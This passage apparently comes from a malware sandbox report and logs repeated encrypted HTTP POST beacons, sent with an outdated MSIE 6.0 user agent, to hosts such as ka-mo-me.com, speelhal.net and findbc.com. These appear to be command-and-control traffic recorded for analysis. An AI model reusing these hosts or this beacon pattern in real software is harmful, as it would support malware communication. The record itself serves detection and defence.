6GWuOi7asol83PfwOVvwy5G72lCu14mcQs3kyWM82R1ztd6nf6ByRm2wCdFr598pC/x52kD2lI2LiQD+pn+znI6qtYZ+bUxP9bzoukyqq5yUYemjPaSvQnjwzXmQoqmjADEvyMthDcUqZwMsrZFAhYpo//e5LsmMfX1/2lhKBbPkec6nw30j0uGpuv+NeduG2xdet4JlInoh0MdL9BDHwIaQMt01j4kbrWW8QeN03LnpbfY9461+FICX2lK4Gno8Evl5zhLZiOkiyf2MahjgSSasTnrzk9Qq8zCqlLENHY4FTMO33/JYp/VmSYZxLMY2JJWHaaW1HYGQwuvRpwvS/ByROqPkJgp5OAMrNy2sUAYZck3HuaKKXKXOcrT11OchRsdq6zPMG4E7dpmVIZunb/GVD/L0TDHvGUq2R40n8OvWcqw/If2FxHBOgGkDioswHn9LZbgWS6jHt6sZUY+xQQi1VkHn8SIv9sXglv1z2ODOw7rkoNFt+HK2ImLISL7QozO3waPN42HMoCINz+I/g8YKkO5OJZwnAA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 34 49 4b 72 4f 68 6a 61 73 6f 6d 78 35 74 46 31 47 35 62 42 79 51 76 42 41 6c 4c 67 76 6b 4b 4d 7a 43 5a 71 2b 63 35 56 6c 61 74 4c 55 45 55 57 6c 37 47 50 5a 4a 67 55 68 77 43 77 7a 33 50 59 44 50 4e 43 44 74 48 41 2b 73 55 31 71 74 44 4c 2b 32 2f 75 30 50 44 47 64 52 63 49 31 73 78 61 6b 31 71 4f 72 51 4b 4f 57 77 54 74 72 75 2f 42 6d 41 52 59 30 55 6c 45 51 31 4e 32 78 4e 2b 6f 6b 68 70 42 4a 6e 4c 6c 31 6c 56 46 72 61 64 6b 71 56 6d 5a 33 6b 35 6b 7a 42 42 49 37 44 69 57 2f 43 65 4c 67 4e 61 73 6e 6c 36 56 41 4f 46 77 41 31 66 56 52 41 37 39 48 48 65 55 62 47 6c 49 65 4b 43 66 62 5a 50 53 4e 65 4f 51 4a 4c 2b 71 34 77 2b 37 31 63 6b 62 54 50 64 4d 74 4e 51 77 65 30 65 37 50 71 6e 73 62 64 50 71 4d 71 41 31 67 54 59 52 56 58 4e 77 59 54 31 55 2b 69 67 78 72 44 77 43 4a 6e 72 45 56 49 66 47 6c 2b 58 58 70 31 66 41 54 36 68 59 35 46 4d 79 41 4f 6d 34 36 71 4b 6a 64 49 45 4e 38 44 4d 30 4d 43 66 70 48 72 54 6e 39 48 65 31 47 47 71 63 32 47 61 61 68 50 38 77 73 64 68 2b 4b 69 78 74 6b 63 49 6a 79 69 2b 43 65 66 6e 4d 37 4b 2b 4e 46 59 49 4f 36 67 51 46 61 4f 77 32 49 4b 37 50 31 32 64 4d 32 64 53 6d 74 79 4b 45 72 66 79 41 52 72 58 62 59 51 44 61 6a 57 6b 42 6c 6e 77 46 64 33 53 61 49 48 4a 37 65 59 7a 36 4d 73 50 6c 68 53 6f 4e 35 74 33 72 76 43 61 33 51 46 50 44 6c 4b 4e 67 4b 43 64 55 73 58 51 63 44 62 4e 64 63 41 63 4d 6d 4b 6b 62 73 54 75 4a 76 6b 62 4d 72 48 36 43 70 48 4b 58 50 76 66 34 44 6c 58 6f 54 62 76 43 48 67 4e 67 70 6f 72 49 6e 6d 39 30 51 5a 69 6d 4c 62 31 75 58 4b 33 2f 43 47 6b 55 44 53 79 61 6b 32 6a 75 72 35 77 47 62 4d 54 78 64 69 6c 55 53 76 75 52 73 4f 6b 34 6c 51 55 46 57 77 78 58 71 4d 74 42 53 6f 79 2b 62 6b 2b 50 5a 37 56 4b 63 32 61 44 68 6c 4c 6e 69 76 30 4b 54 41 58 35 4d 46 59 3d Data Ascii: 4IKrOhjasomx5tF1G5bByQvBAlLgvkKMzCZq+c5VlatLUEUWl7GPZJgUhwCwz3PYDPNCDtHA+sU1qtDL+2/u0PDGdRcI1sxak1qOrQKOWwTtru/BmARY0UlEQ1N2xN+okhpBJnLl1lVFradkqVmZ3k5kzBBI7DiW/CeLgNasnl6VAOFwA1fVRA79HHeUbGlIeKCfbZPSNeOQJL+q4w+71ckbTPdMtNQwe0e7PqnsbdPqMqA1gTYRVXNwYT1U+igxrDwCJnrEVIfGl+XXp1fAT6hY5FMyAOm46qKjdIEN8DM0MCfpHrTn9He1GGqc2GaahP8wsdh+KixtkcIjyi+CefnM7K+NFYIO6gQFaOw2IK7P12dM2dSmtyKErfyARrXbYQDajWkBlnwFd3SaIHJ7eYz6MsPlhSoN5t3rvCa3QFPDlKNgKCdUsXQcDbNdcAcMmKkbsTuJvkbMrH6CpHKXPvf4DlXoTbvCHgNgporInm90QZimLb1uXK3/CGkUDSyak2jur5wGbMTxdilUSvuRsOk4lQUFWwxXqMtBSoy+bk+PZ7VKc2aDhlLniv0KTAX5MFY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 36 47 57 75 4f 69 37 61 73 6f 6c 38 33 50 66 77 4f 56 76 77 79 35 47 37 32 6c 43 75 31 34 6d 63 51 73 33 6b 79 57 4d 38 32 52 31 7a 74 64 36 6e 66 36 42 79 52 6d 32 77 43 64 46 72 35 39 38 70 43 2f 78 35 32 6b 44 32 6c 49 32 4c 69 51 44 2b 70 6e 2b 7a 6e 49 36 71 74 59 5a 2b 62 55 78 50 39 62 7a 6f 75 6b 79 71 71 35 79 55 59 65 6d 6a 50 61 53 76 51 6e 6a 77 7a 58 6d 51 6f 71 6d 6a 41 44 45 76 79 4d 74 68 44 63 55 71 5a 77 4d 73 72 5a 46 41 68 59 70 6f 2f 2f 65 35 4c 73 6d 4d 66 58 31 2f 32 6c 68 4b 42 62 50 6b 65 63 36 6e 77 33 30 6a 30 75 47 70 75 76 2b 4e 65 64 75 47 32 78 64 65 74 34 4a 6c 49 6e 6f 68 30 4d 64 4c 39 42 44 48 77 49 61 51 4d 74 30 31 6a 34 6b 62 72 57 57 38 51 65 4e 30 33 4c 6e 70 62 66 59 39 34 36 31 2b 46 49 43 58 32 6c 4b 34 47 6e 6f 38 45 76 6c 35 7a 68 4c 5a 69 4f 6b 69 79 66 32 4d 61 68 6a 67 53 53 61 73 54 6e 72 7a 6b 39 51 71 38 7a 43 71 6c 4c 45 4e 48 59 34 46 54 4d 4f 33 33 2f 4a 59 70 2f 56 6d 53 59 5a 78 4c 4d 59 32 4a 4a 57 48 61 61 57 31 48 59 47 51 77 75 76 52 70 77 76 53 2f 42 79 52 4f 71 50 6b 4a 67 70 35 4f 41 4d 72 4e 79 32 73 55 41 59 5a 63 6b 33 48 75 61 4b 4b 58 4b 58 4f 63 72 54 31 31 4f 63 68 52 73 64 71 36 7a 50 4d 47 34 45 37 64 70 6d 56 49 5a 75 6e 62 2f 47 56 44 2f 4c 30 54 44 48 76 47 55 71 32 52 34 30 6e 38 4f 76 57 63 71 77 2f 49 66 32 46 78 48 42 4f 67 47 6b 44 69 6f 73 77 48 6e 39 4c 5a 62 67 57 53 36 6a 48 74 36 73 5a 55 59 2b 78 51 51 69 31 56 6b 48 6e 38 53 49 76 39 73 58 67 6c 76 31 7a 32 4f 44 4f 77 37 72 6b 6f 4e 46 74 2b 48 4b 32 49 6d 4c 49 53 4c 37 51 6f 7a 4f 33 77 61 50 4e 34 32 48 4d 6f 43 49 4e 7a 2b 49 2f 67 38 59 4b 6b 4f 35 4f 4a 5a 77 6e 41 41 3d 3d Data Ascii: 6GWuOi7asol83PfwOVvwy5G72lCu14mcQs3kyWM82R1ztd6nf6ByRm2wCdFr598pC/x52kD2lI2LiQD+pn+znI6qtYZ+bUxP9bzoukyqq5yUYemjPaSvQnjwzXmQoqmjADEvyMthDcUqZwMsrZFAhYpo//e5LsmMfX1/2lhKBbPkec6nw30j0uGpuv+NeduG2xdet4JlInoh0MdL9BDHwIaQMt01j4kbrWW8QeN03LnpbfY9461+FICX2lK4Gno8Evl5zhLZiOkiyf2MahjgSSasTnrzk9Qq8zCqlLENHY4FTMO33/JYp/VmSYZxLMY2JJWHaaW1HYGQwuvRpwvS/ByROqPkJgp5OAMrNy2sUAYZck3HuaKKXKXOcrT11OchRsdq6zPMG4E7dpmVIZunb/GVD/L0TDHvGUq2R40n8OvWcqw/If2FxHBOgGkDioswHn9LZbgWS6jHt6sZUY+xQQi1VkHn8SIv9sXglv1z2ODOw7rkoNFt+HK2ImLISL7QozO3waPN42HMoCINz+I/g8YKkO5OJZwnAA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 34 49 4b 72 4f 68 6a 61 73 6f 6d 78 35 74 46 31 47 35 62 42 79 51 76 42 41 6c 4c 67 76 6b 4b 4d 7a 43 5a 71 2b 63 35 56 6c 61 74 4c 55 45 55 57 6c 37 47 50 5a 4a 67 55 68 77 43 77 7a 33 50 59 44 50 4e 43 44 74 48 41 2b 73 55 31 71 74 44 4c 2b 32 2f 75 30 50 44 47 64 52 63 49 31 73 78 61 6b 31 71 4f 72 51 4b 4f 57 77 54 74 72 75 2f 42 6d 41 52 59 30 55 6c 45 51 31 4e 32 78 4e 2b 6f 6b 68 70 42 4a 6e 4c 6c 31 6c 56 46 72 61 64 6b 71 56 6d 5a 33 6b 35 6b 7a 42 42 49 37 44 69 57 2f 43 65 4c 67 4e 61 73 6e 6c 36 56 41 4f 46 77 41 31 66 56 52 41 37 39 48 48 65 55 62 47 6c 49 65 4b 43 66 62 5a 50 53 4e 65 4f 51 4a 4c 2b 71 34 77 2b 37 31 63 6b 62 54 50 64 4d 74 4e 51 77 65 30 65 37 50 71 6e 73 62 64 50 71 4d 71 41 31 67 54 59 52 56 58 4e 77 59 54 31 55 2b 69 67 78 72 44 77 43 4a 6e 72 45 56 49 66 47 6c 2b 58 58 70 31 66 41 54 36 68 59 35 46 4d 79 41 4f 6d 34 36 71 4b 6a 64 49 45 4e 38 44 4d 30 4d 43 66 70 48 72 54 6e 39 48 65 31 47 47 71 63 32 47 61 61 68 50 38 77 73 64 68 2b 4b 69 78 74 6b 63 49 6a 79 69 2b 43 65 66 6e 4d 37 4b 2b 4e 46 59 49 4f 36 67 51 46 61 4f 77 32 49 4b 37 50 31 32 64 4d 32 64 53 6d 74 79 4b 45 72 66 79 41 52 72 58 62 59 51 44 61 6a 57 6b 42 6c 6e 77 46 64 33 53 61 49 48 4a 37 65 59 7a 36 4d 73 50 6c 68 53 6f 4e 35 74 33 72 76 43 61 33 51 46 50 44 6c 4b 4e 67 4b 43 64 55 73 58 51 63 44 62 4e 64 63 41 63 4d 6d 4b 6b 62 73 54 75 4a 76 6b 62 4d 72 48 36 43 70 48 4b 58 50 76 66 34 44 6c 58 6f 54 62 76 43 48 67 4e 67 70 6f 72 49 6e 6d 39 30 51 5a 69 6d 4c 62 31 75 58 4b 33 2f 43 47 6b 55 44 53 79 61 6b 32 6a 75 72 35 77 47 62 4d 54 78 64 69 6c 55 53 76 75 52 73 4f 6b 34 6c 51 55 46 57 77 78 58 71 4d 74 42 53 6f 79 2b 62 6b 2b 50 5a 37 56 4b 63 32 61 44 68 6c 4c 6e 69 76 30 4b 54 41 58 35 4d 46 59 3d Data Ascii: 4IKrOhjasomx5tF1G5bByQvBAlLgvkKMzCZq+c5VlatLUEUWl7GPZJgUhwCwz3PYDPNCDtHA+sU1qtDL+2/u0PDGdRcI1sxak1qOrQKOWwTtru/BmARY0UlEQ1N2xN+okhpBJnLl1lVFradkqVmZ3k5kzBBI7DiW/CeLgNasnl6VAOFwA1fVRA79HHeUbGlIeKCfbZPSNeOQJL+q4w+71ckbTPdMtNQwe0e7PqnsbdPqMqA1gTYRVXNwYT1U+igxrDwCJnrEVIfGl+XXp1fAT6hY5FMyAOm46qKjdIEN8DM0MCfpHrTn9He1GGqc2GaahP8wsdh+KixtkcIjyi+CefnM7K+NFYIO6gQFaOw2IK7P12dM2dSmtyKErfyARrXbYQDajWkBlnwFd3SaIHJ7eYz6MsPlhSoN5t3rvCa3QFPDlKNgKCdUsXQcDbNdcAcMmKkbsTuJvkbMrH6CpHKXPvf4DlXoTbvCHgNgporInm90QZimLb1uXK3/CGkUDSyak2jur5wGbMTxdilUSvuRsOk4lQUFWwxXqMtBSoy+bk+PZ7VKc2aDhlLniv0KTAX5MFY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 5a 51 56 6c 6c 44 68 56 33 34 6e 4d 41 52 74 64 75 35 63 79 69 79 75 4a 6e 7a 71 41 71 42 56 66 37 4c 76 57 68 7a 62 5a 44 34 56 35 50 6b 32 34 2b 64 64 45 43 64 67 4c 46 4c 58 6f 73 56 42 45 69 4b 70 2b 31 49 57 74 6f 4e 77 67 45 4f 32 4b 7a 6b 6d 65 50 42 43 63 43 55 66 31 66 77 2b 70 43 62 70 48 42 2b 35 38 30 43 52 42 79 74 41 45 4d 30 7a 72 63 6d 56 39 7a 38 4d 33 49 74 6b 41 72 43 46 44 5a 74 62 68 75 5a 31 41 30 78 2b 68 5a 70 43 6c 4c 50 78 36 64 38 2b 36 51 39 70 68 65 43 51 64 67 70 45 4a 75 6d 65 4e 61 72 47 54 77 76 49 6c 73 6e 46 7a 31 2b 4e 53 6d 6f 49 58 36 65 36 70 49 74 62 45 7a 69 4b 31 43 42 42 6f 41 57 6f 5a 31 5a 52 58 63 72 37 65 6a 44 49 55 58 79 6b 56 78 42 63 38 68 73 31 50 50 4e 2f 59 44 4e 53 42 32 6f 61 2f 33 2f 45 71 45 59 59 7a 6f 4a 59 68 49 75 4b 76 78 76 72 50 71 77 39 36 54 7a 4c 79 65 2f 55 34 6d 73 58 71 35 4a 39 38 35 4c 4d 49 44 54 66 66 33 6c 4e 65 33 38 45 47 33 78 6b 4d 6a 75 67 77 2f 43 45 34 5a 4e 45 73 48 66 39 4a 64 45 38 62 52 4d 57 6a 41 68 6a 37 43 54 44 63 52 33 51 50 74 2f 51 59 69 7a 32 48 48 36 66 68 4d 4c 77 52 38 34 66 65 61 55 61 54 78 48 56 56 4c 48 38 6b 54 30 45 73 6f 4d 56 62 77 32 6c 4d 67 33 59 54 55 70 4c 39 56 70 33 6a 6b 30 6b 79 39 52 74 69 32 34 69 4b 63 36 6f 34 38 62 4f 51 4b 76 43 59 75 5a 74 6c 57 5a 65 55 55 52 59 64 45 70 56 57 47 6b 63 53 52 67 4c 56 4f 32 68 73 4c 51 4d 47 64 57 34 32 6c 45 4c 56 6a 76 51 37 46 44 55 58 6c 7a 4b 77 4a 51 4c 70 5a 30 37 55 70 37 36 35 4e 42 49 4e 74 31 45 73 73 4f 2b 38 48 4b 51 50 4e 59 6b 6c 39 62 64 62 34 36 66 56 52 32 51 72 4a 65 6b 50 76 77 31 44 6b 64 52 4d 5a 53 6e 6c 4c 6c 74 71 5a 38 42 4a 70 4f 69 72 38 7a 6b 7a 49 57 79 6a 6c 68 62 36 4c 4f 30 33 33 69 47 35 73 42 79 4a 2f 41 6d 63 78 51 3d 3d Data Ascii: ZQVllDhV34nMARtdu5cyiyuJnzqAqBVf7LvWhzbZD4V5Pk24+ddECdgLFLXosVBEiKp+1IWtoNwgEO2KzkmePBCcCUf1fw+pCbpHB+580CRBytAEM0zrcmV9z8M3ItkArCFDZtbhuZ1A0x+hZpClLPx6d8+6Q9pheCQdgpEJumeNarGTwvIlsnFz1+NSmoIX6e6pItbEziK1CBBoAWoZ1ZRXcr7ejDIUXykVxBc8hs1PPN/YDNSB2oa/3/EqEYYzoJYhIuKvxvrPqw96TzLye/U4msXq5J985LMIDTff3lNe38EG3xkMjugw/CE4ZNEsHf9JdE8bRMWjAhj7CTDcR3QPt/QYiz2HH6fhMLwR84feaUaTxHVVLH8kT0EsoMVbw2lMg3YTUpL9Vp3jk0ky9Rti24iKc6o48bOQKvCYuZtlWZeUURYdEpVWGkcSRgLVO2hsLQMGdW42lELVjvQ7FDUXlzKwJQLpZ07Up765NBINt1EssO+8HKQPNYkl9bdb46fVR2QrJekPvw1DkdRMZSnlLltqZ8BJpOir8zkzIWyjlhb6LO033iG5sByJ/AmcxQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.com-sit.comCache-Control: no-cacheData Raw: 6f 34 69 6c 6d 71 73 70 38 49 6e 2f 51 7a 68 31 67 6a 50 75 2f 78 51 64 50 53 42 78 6a 66 68 43 44 35 35 74 4e 71 58 56 45 33 46 6d 41 6d 36 33 79 77 78 70 43 58 49 75 6c 2b 61 30 6f 6a 74 44 2f 56 41 75 43 4b 71 63 77 55 46 74 58 2f 65 56 59 5a 48 4b 44 48 54 62 2f 62 57 56 74 62 76 75 31 58 6c 78 2f 42 33 6b 72 41 39 72 33 5a 69 2f 57 39 69 34 33 72 4f 71 55 31 53 6d 32 6c 39 72 36 65 76 6e 54 46 57 4b 70 48 71 5a 43 34 48 56 4b 67 65 76 53 70 73 6b 36 74 58 49 31 74 74 63 67 4a 64 74 71 31 53 4d 7a 68 6b 38 6f 43 6c 54 56 41 41 79 46 48 77 31 73 56 45 46 53 44 36 71 75 6e 38 78 75 2f 5a 32 64 69 53 4b 55 46 63 4c 66 50 55 50 31 76 6e 79 55 6d 35 4a 53 50 6d 6f 4a 37 33 72 43 44 50 31 48 76 6e 41 51 58 32 38 5a 50 36 68 54 46 6d 30 76 6b 39 2b 77 36 4b 49 38 31 43 46 51 48 71 6a 74 6c 36 4c 6e 30 55 51 7a 49 41 56 39 41 42 2f 73 78 70 32 35 76 49 54 38 5a 74 55 52 68 4c 6c 4c 61 2f 66 4f 47 43 6f 78 73 48 57 4d 69 4c 70 41 2f 34 54 69 55 61 64 2b 7a 6a 75 6b 4a 4f 70 79 2f 4a 63 76 71 43 67 5a 53 44 36 48 59 45 52 57 54 4c 42 38 67 54 4b 48 48 32 31 37 51 56 6f 6a 35 32 31 76 52 68 4e 53 57 7a 2f 54 69 69 66 57 58 75 77 43 39 35 36 44 48 39 72 34 54 76 33 51 48 76 38 45 73 4c 71 33 39 6c 33 66 64 57 7a 4a 78 33 38 6f 32 59 45 6c 70 45 43 73 77 76 63 50 6d 61 72 52 31 51 78 73 6a 72 6c 35 4c 61 73 57 6b 35 42 57 74 39 63 30 73 63 7a 37 73 65 59 2f 78 65 41 65 6b 69 36 76 33 38 74 45 34 44 71 31 6b 70 36 53 6c 74 30 37 2f 6b 5a 53 35 76 42 7a 37 45 63 69 56 52 4c 77 72 6d 5a 67 6b 63 2f 6a 34 71 6d 46 49 4a 4d 47 47 71 62 52 42 2f 6f 66 50 71 7a 42 65 4f 32 53 6f 64 7a 4a 4b 6b 6b 42 58 6c 4e 50 79 66 36 70 51 47 44 34 52 64 54 35 67 3d 3d Data Ascii: o4ilmqsp8In/Qzh1gjPu/xQdPSBxjfhCD55tNqXVE3FmAm63ywxpCXIul+a0ojtD/VAuCKqcwUFtX/eVYZHKDHTb/bWVtbvu1Xlx/B3krA9r3Zi/W9i43rOqU1Sm2l9r6evnTFWKpHqZC4HVKgevSpsk6tXI1ttcgJdtq1SMzhk8oClTVAAyFHw1sVEFSD6qun8xu/Z2diSKUFcLfPUP1vnyUm5JSPmoJ73rCDP1HvnAQX28ZP6hTFm0vk9+w6KI81CFQHqjtl6Ln0UQzIAV9AB/sxp25vIT8ZtURhLlLa/fOGCoxsHWMiLpA/4TiUad+zjukJOpy/JcvqCgZSD6HYERWTLB8gTKHH217QVoj521vRhNSWz/TiifWXuwC956DH9r4Tv3QHv8EsLq39l3fdWzJx38o2YElpECswvcPmarR1Qxsjrl5LasWk5BWt9c0scz7seY/xeAeki6v38tE4Dq1kp6Slt07/kZS5vBz7EciVRLwrmZgkc/j4qmFIJMGGqbRB/ofPqzBeO2SodzJKkkBXlNPyf6pQGD4RdT5g==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 69 70 77 69 64 4c 30 35 39 34 6c 74 66 6d 4e 6b 64 43 39 7a 59 76 59 77 6e 64 44 72 6d 39 64 77 51 54 5a 76 31 49 5a 6b 37 37 39 62 33 4c 6b 69 65 52 2b 46 77 66 31 33 65 44 35 78 41 4b 54 2f 71 54 52 50 58 6e 6b 55 37 63 68 63 57 49 42 61 5a 35 4a 38 33 72 42 7a 65 42 73 53 64 6e 74 78 6d 65 70 30 4d 73 46 71 65 50 6b 49 44 4b 32 64 52 4a 46 76 31 78 61 42 53 77 62 45 75 75 72 76 68 77 75 56 48 69 6c 53 48 4b 69 30 41 36 69 6c 33 58 6e 76 58 32 4a 41 71 4e 4f 4c 6a 38 6d 2b 75 77 6e 38 46 4c 4d 6c 46 52 4e 76 77 34 6b 47 4e 54 65 2f 5a 59 7a 65 70 51 30 6b 64 53 67 44 49 32 48 5a 6d 67 6a 4a 31 6c 47 32 58 53 78 58 30 6e 41 72 59 55 6f 2b 6a 74 66 72 33 38 35 33 61 43 43 56 2f 4c 71 48 6d 70 4b 44 35 4d 36 48 31 64 35 46 74 62 53 7a 5a 32 34 64 5a 4a 6e 72 65 37 33 56 51 75 37 2f 78 37 6b 48 32 50 64 72 65 69 35 62 5a 4c 6f 62 52 71 59 47 62 47 5a 68 34 79 30 46 44 66 69 42 37 72 43 6a 43 38 34 67 72 70 44 46 2b 6a 69 75 6c 64 74 2f 58 47 54 6b 71 59 41 57 6c 55 32 2f 51 4c 39 59 61 70 71 46 6b 4e 55 53 62 49 77 78 65 52 78 57 54 4d 42 6e 72 4b 57 52 42 4b 6e 35 7a 2b 48 43 68 76 4f 6a 79 61 61 76 64 76 48 72 59 61 2f 34 4f 49 34 39 67 53 37 49 75 46 34 75 6d 31 50 2b 74 55 5a 57 6c 46 4c 32 4c 5a 6e 42 6c 33 32 6c 45 4d 70 49 4d 53 50 2f 4e 58 6b 46 31 56 5a 53 33 53 65 4f 46 57 6f 4e 65 75 36 59 31 77 51 41 6c 71 47 33 4f 4d 57 49 56 57 6b 75 4d 6e 6c 45 77 33 51 4a 77 55 6f 77 57 77 39 6a 59 4f 65 79 67 46 34 48 77 4a 6d 67 5a 70 43 31 30 6b 51 52 48 48 39 68 51 6c 42 4d 7a 53 74 4d 33 5a 72 44 39 44 4f 65 74 4c 79 59 70 4d 76 4d 31 45 74 41 33 48 68 51 51 30 6e 36 45 36 33 63 67 34 77 39 62 65 55 74 6f 71 65 59 35 74 37 67 53 6b 6b 51 42 61 4f 34 46 64 77 6d 41 52 47 7a Data Ascii: ipwidL0594ltfmNkdC9zYvYwndDrm9dwQTZv1IZk779b3LkieR+Fwf13eD5xAKT/qTRPXnkU7chcWIBaZ5J83rBzeBsSdntxmep0MsFqePkIDK2dRJFv1xaBSwbEuurvhwuVHilSHKi0A6il3XnvX2JAqNOLj8m+uwn8FLMlFRNvw4kGNTe/ZYzepQ0kdSgDI2HZmgjJ1lG2XSxX0nArYUo+jtfr3853aCCV/LqHmpKD5M6H1d5FtbSzZ24dZJnre73VQu7/x7kH2Pdrei5bZLobRqYGbGZh4y0FDfiB7rCjC84grpDF+jiuldt/XGTkqYAWlU2/QL9YapqFkNUSbIwxeRxWTMBnrKWRBKn5z+HChvOjyaavdvHrYa/4OI49gS7IuF4um1P+tUZWlFL2LZnBl32lEMpIMSP/NXkF1VZS3SeOFWoNeu6Y1wQAlqG3OMWIVWkuMnlEw3QJwUowWw9jYOeygF4HwJmgZpC10kQRHH9hQlBMzStM3ZrD9DOetLyYpMvM1EtA3HhQQ0n6E63cg4w9beUtoqeY5t7gSkkQBaO4FdwmARGz
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 49 4e 4b 70 4d 33 59 53 44 6f 70 76 70 49 68 52 30 65 63 47 71 42 6e 44 44 42 32 57 4f 56 79 6d 43 75 5a 67 62 2b 41 4b 42 68 6a 37 53 48 48 66 54 43 70 55 30 52 6a 49 2f 77 75 38 68 49 33 6e 4b 38 69 55 75 61 56 7a 78 64 52 30 43 6f 5a 72 68 4a 2b 38 66 66 6b 62 32 46 65 46 78 6b 35 6c 64 38 4c 47 76 62 6f 55 4b 77 46 66 58 55 77 6e 6c 31 41 71 69 35 6d 56 57 41 4d 58 38 39 58 50 46 65 52 68 69 46 6b 42 34 30 48 64 6b 31 4e 6b 64 64 58 53 4a 79 75 66 47 4a 44 6a 50 57 36 64 49 35 66 63 5a 46 33 68 53 6f 76 4d 51 56 42 59 36 69 61 34 6b 4b 77 45 6b 6b 4c 30 2b 31 61 72 66 79 47 75 4f 61 42 4c 64 56 7a 42 30 6c 44 43 41 38 75 73 39 5a 53 6f 6d 72 61 49 58 4f 62 4d 49 31 57 36 67 67 6e 62 57 72 7a 6e 2b 79 36 72 6f 45 37 6d 2b 56 47 44 51 37 35 52 78 75 45 6c 4e 4f 50 43 56 72 53 32 6a 45 71 72 78 71 50 75 30 50 2b 35 4b 4a 65 58 53 35 36 4f 54 67 2b 43 51 2f 50 6d 51 31 4c 31 58 50 43 77 4a 48 56 2b 46 38 6c 32 43 71 4a 49 38 77 74 75 38 65 7a 71 48 67 52 78 58 56 6c 68 30 53 48 59 38 4d 6b 41 6d 75 31 4a 66 6e 76 44 4b 43 44 59 6d 63 6e 49 75 4f 51 36 63 58 6e 7a 43 75 6c 2f 6d 2f 53 54 52 47 41 4d 64 66 4e 51 61 32 71 76 4f 7a 58 55 6c 63 6f 52 58 31 77 53 45 34 45 52 6c 7a 44 74 64 77 4f 75 61 48 32 78 52 33 2f 53 79 6d 43 69 42 53 31 58 32 2b 6f 75 70 42 66 55 48 42 74 75 35 33 4f 79 64 4a 58 6c 4b 76 4e 66 49 48 52 68 6e 65 55 59 52 34 52 67 39 72 67 63 66 79 4c 42 2b 78 51 67 4b 75 37 2b 5a 76 52 43 2b 73 66 7a 54 34 62 47 76 64 58 30 47 4e 51 5a 6d 37 4d 63 7a 47 74 41 6c 77 52 58 65 34 71 76 47 30 39 6a 55 49 79 4e 79 68 47 59 45 2b 4e 4c 55 64 32 69 6b 35 4e 52 50 4c 43 31 Data Ascii: INKpM3YSDopvpIhR0ecGqBnDDB2WOVymCuZgb+AKBhj7SHHfTCpU0RjI/wu8hI3nK8iUuaVzxdR0CoZrhJ+8ffkb2FeFxk5ld8LGvboUKwFfXUwnl1Aqi5mVWAMX89XPFeRhiFkB40Hdk1NkddXSJyufGJDjPW6dI5fcZF3hSovMQVBY6ia4kKwEkkL0+1arfyGuOaBLdVzB0lDCA8us9ZSomraIXObMI1W6ggnbWrzn+y6roE7m+VGDQ75RxuElNOPCVrS2jEqrxqPu0P+5KJeXS56OTg+CQ/PmQ1L1XPCwJHV+F8l2CqJI8wtu8ezqHgRxXVlh0SHY8MkAmu1JfnvDKCDYmcnIuOQ6cXnzCul/m/STRGAMdfNQa2qvOzXUlcoRX1wSE4ERlzDtdwOuaH2xR3/SymCiBS1X2+oupBfUHBtu53OydJXlKvNfIHRhneUYR4Rg9rgcfyLB+xQgKu7+ZvRC+sfzT4bGvdX0GNQZm7MczGtAlwRXe4qvG09jUIyNyhGYE+NLUd2ik5NRPLC1
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 71 5a 47 55 58 61 6c 66 4b 49 6f 56 69 38 57 6c 65 43 51 61 72 73 49 4a 55 42 70 48 56 6a 71 64 37 61 51 4b 67 75 75 43 45 4a 68 36 50 75 2f 4d 56 6c 38 4f 6f 34 52 79 52 4f 6d 45 71 72 65 4c 38 71 55 48 70 48 65 71 36 4f 69 4e 59 5a 76 4e 37 7a 56 4e 51 6d 67 44 41 77 59 47 52 2f 41 4e 49 54 55 45 4c 7a 70 67 4d 55 59 76 4d 56 44 50 45 6a 71 63 69 45 62 34 4c 70 66 33 4e 4e 50 71 58 4d 46 61 6a 43 53 56 6f 77 37 79 52 49 77 32 64 2b 6a 70 62 34 38 4f 6d 35 67 63 38 77 46 34 53 69 49 77 6f 6f 55 2f 66 4e 51 34 5a 44 75 43 73 66 32 50 52 45 73 67 62 6b 46 7a 51 79 78 53 36 47 72 4d 56 50 4a 4d 54 7a 72 58 56 4f 42 67 73 4d 46 33 6a 44 73 5a 47 48 52 78 44 6e 54 50 70 75 51 49 54 39 59 6e 4c 57 32 44 34 6f 35 2f 50 63 31 52 6d 50 30 67 78 6d 62 79 2f 34 71 5a 68 66 4a 77 69 41 34 78 77 6a 4a 61 6a 2b 6f 55 72 48 63 46 4d 73 69 47 31 42 7a 63 4a 31 77 7a 69 